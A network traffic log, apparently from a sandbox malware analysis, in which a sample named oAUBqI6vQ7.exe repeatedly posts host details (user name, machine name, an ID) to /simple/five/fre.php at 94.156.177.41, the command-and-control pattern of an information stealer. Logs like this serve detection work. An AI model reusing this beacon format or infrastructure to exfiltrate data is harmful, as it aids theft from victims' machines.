Jan 10, 2025 23:40:12.991015911 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:12.999100924 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:13.727185965 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.9	50028	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:13.874910116 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:13.879820108 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:14.585774899 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.9	50029	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:14.746467113 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:14.751607895 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:15.480221987 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.9	50030	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:15.626513004 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:15.631391048 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:16.344279051 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.9	50031	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:16.490894079 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:16.495719910 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:17.240819931 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.9	50033	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:17.393306971 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:17.398130894 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:18.254407883 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.9	50034	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:18.411567926 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:18.418308020 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:19.174654007 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.9	50035	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:19.331310034 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:19.336241961 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:20.066636086 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.9	50036	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:20.311211109 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:20.316028118 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:21.045209885 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.9	50037	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:21.196549892 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:21.201504946 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:21.955156088 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.9	50038	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:22.110436916 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:22.115263939 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:22.833010912 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.9	50039	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:22.997394085 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:23.003055096 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:23.751576900 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.9	50040	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:23.931641102 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:23.937030077 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:24.799241066 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.9	50041	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:24.957561016 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:24.962376118 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:25.745421886 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.9	50042	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:25.894891024 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:25.899745941 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:26.637778997 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.9	50043	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:26.791374922 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:26.796508074 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:27.986593962 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Jan 10, 2025 23:40:27.987335920 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.9	50044	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:28.343265057 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:28.348115921 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:29.071083069 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.9	50045	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:29.246335030 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:29.251179934 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:29.972733974 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.9	50046	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:30.124803066 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:30.129740000 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:30.832135916 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.9	50047	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:30.984646082 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:30.989628077 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:31.733160973 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.9	50048	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:31.878393888 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:31.883333921 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:32.606173992 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.9	50049	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:32.753004074 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:32.757846117 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
